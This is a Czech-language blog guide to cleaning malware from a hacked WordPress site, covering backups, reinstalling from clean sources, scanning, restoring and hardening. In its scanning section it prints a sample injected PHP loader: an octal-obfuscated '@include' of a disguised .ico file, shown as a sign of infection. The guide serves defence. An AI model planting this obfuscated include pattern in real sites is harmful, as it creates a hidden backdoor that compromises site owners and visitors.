Vyčištění WordPressu od napadení viry a malwary

Pokud vlastníte webové stránky stavěny na WordPressu, je nutné se ujistit, že je web dobře zabezpečený. Sebemenší zranitelné místo může být pro hackery snadným cílem, díky kterému mohou váš web poškodit mnoha způsoby, například infikováním malwarem. V poslední době se čím dál častěji potýkáme s takovými weby.

Dbejte však zvýšené opatrnosti, některé malwary na webu pouze čekají na svou příležitost a po určitou dobu pouze sbírají IP adresy administrátorů, na které potom není aplikován infikovaný kód.

Malware nelze brát na lehkou váhu, neboť se každým rokem vyvíjí a zlepšuje. Již napadený web Vás může upozornit na existující bezpečnostní problém vašeho systému.

Pokud je váš web napadený, nepropadejte panice. Tento článek vám vysvětlí, jaké riziko to pro vás a vaše online podnikání může znamenat, a zabránit budoucím útokům.

Co je to malware a proč je tak nebezpečný?

Malware si můžete vyložit všeobecně jako škodlivý software. Jak to již napovídá, může nám způsobit škodlivé následky, jako je krádež informací, poškození webové stránky a jména firmy.

Má mnoho podob a každá z nich může způsobit specifický problém. Zde je několik běžných typů malwaru, které byste měli znát:

  • Adware – Automaticky zobrazuje nežádoucí reklamní materiály na vašem webu ( zpravidla se jedná o přesměrování nebo odkazy na např. erotický obsah ).
  • Spyware – Ukládá citlivé informace diskrétním shromažďováním dat.
  • Trojský kůň – Maskuje se jako skutečný software, aby přiměl lidi ke spuštění útočníkovo skriptu na vašem webu
  • Virus – Obsahuje kód pro poškození webu a nadále se replikuje napříč webem. Obvykle přichází s náhlým nárůstem spotřeby výkonu serveru.
  • Ransomware – Uzamkne web, dokud někdo nezaplatí určené množství peněz.

Pokud má váš web některý z výše uvedených příznaků, můžete to být známkou toho, že se u vás vyskytuje útok malwarem. Důležité v tuhle chvíli je upozornit na fakt, že napadený web má nepříznivý vliv na SEO hodnocení, Google zobrazí varovnou zprávu o stránkách, které jsou považovány za škodlivé.

Proto by ochrana vašeho webu běžícím na WordPressu měla být prioritou při budování své online vizitky.

Jak odstraním malware ze svého webu?

Nyní se setkáváte s malwarem a je na čase se ho zbavit, než se do všeho pustíme, rádi bychom Vás upozornili, že by jej měl vykonávat člověk s alespoň základními znalostmi programování.

Přepněte svůj web do režimu údržby

Nejrychlejší cestou, jak tohoto docílit, i přesto že Vaše stránky jsou napadeny malwarem, který Vás automaticky přesměruje, je vytvořením tzn. „dot file“ v hlavním adresáři WordPressu „.maintenance“. Pro větší bezpečnost je vhodné povolit přístup na web pouze z vaši IP adresy během údržby.

Proveďte zálohu webu

Před provedením jakýchkoliv změn je nezbytně nutné zálohovat soubory, abyste neztratili veškeré své data, pokud by proces čistění nešel podle plánu. Existuje několik způsobů, jak to udělat.

Můžete začít s poskytovatelem hostingu. Někteří poskytovatelé nabízejí funkci automatického zálohování, kterou lze naplánovat na denní nebo měsíční na základě vašeho plánu hostingu. Nebo můžete web exportovat pomocí záložního pluginu.

Pokud Vám však malware zamezí přístup do administrace WordPressu, můžete zkusit manuální zálohování pomocí phpMyAdmin.

Poté můžete pokračovat výběrem databáze a kliknutím na záložku Export. Nyní si můžete vybrat rychlou nebo vlastní možnost. Pokud chcete získat lepší přehled o všech datech, která budou exportována, můžete si vybrat vlastní. Poté vám phpMyAdmin pošle exportovanou databázi v souboru ZIP.

Dále si stáhnete celý adresář WordPressu z FTP do složky na počítači.

Reinstalujte WordPress + Dodatečné moduly

Nyní před sebou máte zálohu adresáře s WordPressem, který si zduplikujte a s tím budete pracovat.

  • Stáhněte si z odkazu poslední verzi WordPressu a ten překopírujte do pracovního adresáře.
  • Pro zajištění bezpečnosti je vhodné tento samý postup provést s pluginy a všechny využívané nahradit zdrojovým kódem z ověřeného zdroje.
  • Stejný postup aplikujete také na šablonu, kterou znovu stáhnete ze zdroje, v případě že zdrojem byl archív WordPressu, naleznete jej zde.

Začátky skenování

Pokud nemáte s malwarem zkušenost, můžete využít k proskenování adresáře s WordPressem jeden z mnoha anti-malware softwaru např. Malwarebytes. K proskenování doporučujeme přiložit také zálohu databáze pro jistotu, že nebyla napadená také. Může obsahovat přímo v samotném článku .js soubory např., vyskytují se hlavně v případě, kdy vás stránka přesměrovává ihned po jejím navštívení.

Ze zkušenosti posledních pár měsíců víme, že viry vytváří napříč wordpressem náhodné soubory s koncovkou .php nebo .ico. (např. pfu7mf4.php)

Mezi nejčastěji napadené soubory WordPressu patří index.php, wp-config.php, součásti šablony functions.php, header.php a footer.php, které mohou obsahovat na začátku dokumentu skrytý malware volající právě výše zmíněné zadní vrátka.

<?php
/*178a8*/

@include “\057hom\145/co\155est\157dev\143o/p\165bli\143_ht\155l/w\160-co\156ten\164/pl\165gin\163/so\143ial\055pol\154s-b\171-op\151nio\156sta\147e/.\1469e1\064dad\056ico”;

/*178a8*/
/**

Navrácení webu zpět online

Nyní se připojte zpět na server pomocí FTP a celý obsah smažte z adresáře webu. Nakopírujte obsah, který prošel skenováním zpět do hlavního adresáře. Stejný postup aplikujte také pro databázi skrze phpMyAdmin.

Z adresáře webu odstraňte soubor „.maintenance“ pro vypnutí režimu údržby. Někdy se vám může stát, že Váš poskytovatel může blokovat přístup na webové stránky z důvody nalezení hrozby, pokud ano, můžete je požádat, aby znovu prohledali váš web a poté jeho přístup obnovili.

Již máte zpět svůj web a hlavně přístup do administrace, zkontrolujte ještě, že malware nevytvořil žádné nechtěné uživatelé jako administrátory, skrze které by mohl web ještě ovládat. Pokud ano, smažte je.

 

Ukažte Googlu, že nejste infikováni

V neposlední řadě je důležité odstranit z vašeho webu výstražný štítek, aby Google mohl indexovat váš web.

Zde je třeba následovat pár kroků.

  1. Otevřete si Google Search Console
  2. Přidejte svou stránku
  3. Otevřete rozhraní pro řešení bezpečnostních problémů a požádejte o přehodnocení
  4. O výsledku přehodnocení budete informován emailem

Jak zabránit opětovnému napadení?

Jakmile bude váš web běžet normálně, musíte se ujistit, že nedojde k opětovnému napadení malwarem. Zde je pár tipů, jak svůj web zabezpečit.

 

Zkontrolujte si nastavení Firewallu

Tohle je nejjednodušším způsobem, jak se bránit útokům, Ochrana proti útokům může probíhat již na úrovni serveru a následně potom samotným wordpressem, kdy můžete využít některý z pluginů, který tuhle ochranu nabízí.

Za nás volíme Wordfence Security, který obsahuje skener zdrojového kódu, při zakoupení roční licence, která začíná na $99 dostanete aktualizace pro skenování malwaru a pravidel pro firewall v aktuálním čase.

 

Nezapomínejte na aktualizace

Je velice důležité udržovat váš WordPress stále aktuální a získávat tak nejnovější bezpečnostní záplaty. Pokud váš web potřebujete aktualizace, obvykle tohle oznámení dostanete po přihlášení do administrace, v opačném případě se aktualizuje sám.

Kromě samotného WordPressu je důležité dbát na aktualizace pluginů a šablon. Aktualizaci provedete vždy pod sekci pluginy nebo šablony kliknutím na tlačítko Aktualizovat vedle dané položky.

Mějte však na paměti, že před aktualizaci samotných části je třeba dbát na kompatibilitu samotných modulů mezi sebou a případně upraveného kódu vámi nebo vašim programátorem. Zároveň, že aktualizace může přepsat vaše úpravy, které nejsou zapsány do child šablony.

Pro maximální výkon a bezpečnost kontaktujte vašeho poskytovatele hostingu, zda-li využíváte poslední verze PHP a MySQL.

 

Vždy zálohujte

Zálohování webu je nezbytné, abyste se ujistili, že nepřijdete o svá data, pokud se stane cokoliv nepředvídatelného. Neváhejte kontaktovat poskytovatele hosting, jaká je frekvence záloh vašeho webu a co vše se zálohuje. Zálohy můžete provádět také sám pomocí pluginu.

Zde doporučujeme využít UpdraftPlus , který nabízí kompletní řešení záloh zdarma, které umí zálohovat databázi, naplánovat zálohování webu a kompletně zálohovat váš web kliknutím na tlačítko.

 

Je můj web již v pořádku?

Rádi využíváme k rychlé kontrole webové stránky http://isithacked.com/, kde si můžete sami vyzkoušet, zda-li je Váš web již v pořádku.

Tak na co čekáte? Přejeme vám hodně štěstí s řešením problému.